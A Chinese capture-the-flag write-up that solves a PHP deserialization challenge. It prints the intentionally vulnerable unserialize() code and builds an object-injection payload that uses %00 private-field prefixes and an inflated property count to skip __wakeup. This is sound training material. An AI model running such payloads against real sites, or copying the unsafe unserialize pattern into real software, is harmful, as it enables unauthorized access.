审计练习2——[极客大挑战 2019]PHP

平台：buuoj.cn
打开靶机挨打(卡爆了)

提示了有备份网站，尝试请求www.zip，成功得到源码。
解压得如下文件：

随便点点，flag.php自然是没有flag的，在index.php中只有一段:

    
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

包含了class.php文件，get传入一个select参数再将其反序列化。那么考点可能就是php的反序列化漏洞
来看class.php：

include 'flag.php';


error_reporting(0);


class Name{
     
    private $username = 'nonono';
    private $password = 'yesyes';//声明两个私有变量

    public function __construct($username,$password){
     
        $this->username = $username;
        $this->password = $password;//初始化
    }

    function __wakeup(){
     //反序列化时调用
        $this->username = 'guest';
    }

    function __destruct(){
     
        if ($this->password != 100) {
     
            echo "
NO!!!hacker!!!
";
            echo "You name is: ";
            echo $this->username;echo "
";
            echo "You password is: ";
            echo $this->password;echo "
";
            die();
        }
        if ($this->username === 'admin') {
     
            global $flag;
            echo $flag;
        }else{
     //满足两个if得到flag
            echo "
hello my friend~~
sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

由此我们得知解题的条件：传入一个序列化的字符串，如果字符串经过反序列化之后username=admin，password=100，便会打印出flag。
那么构造序列化字符串。

 
class Name{
     
        private $username = 'nonono';
        private $password = 'yesyes';

        public function __construct($username,$password){
     
                $this->username = $username;
                $this->password = $password; 
        }
}

$payload = new Name('admin',100);
echo serialize($payload);
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

到这再看看前面。
首先是第一个考点：

私有化声明，private是私有类型，该类型的属性或方法只能在该类中使用，在该类的实例、子类中、子类的实例中都不能调用私有类型的属性和方法。

私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀(ASCII 码为 0 的字符(不可见字符))。字符串长度也包括所加前缀的长度。
也就是说usrname和password前面是有一个\0的，但是复制的时候会丢失，因此我们需要加上%00填补上去

O:4:"Name":2:{
     s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

然后我们注意到，在执行__destruct得到flag之前，还会有一个__wakeup函数会在字符串反序列化执行之前把username重新赋值为guest，所以我们需要跳过它。
这里考察了一个php的漏洞：php-bugs-72663
反序列化时，如果反序列化字符串中表示属性个数的值大于真实属性个数时，会跳过 __wakeup 函数的执行。
所以这里我们把name属性的个数在字符串中改一下就行

O:4:"Name":3:{
     s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

将最终的payload传入file得到flag

为啥我这么卡？？难道说我的渣渣电脑已经不配打ctf了吗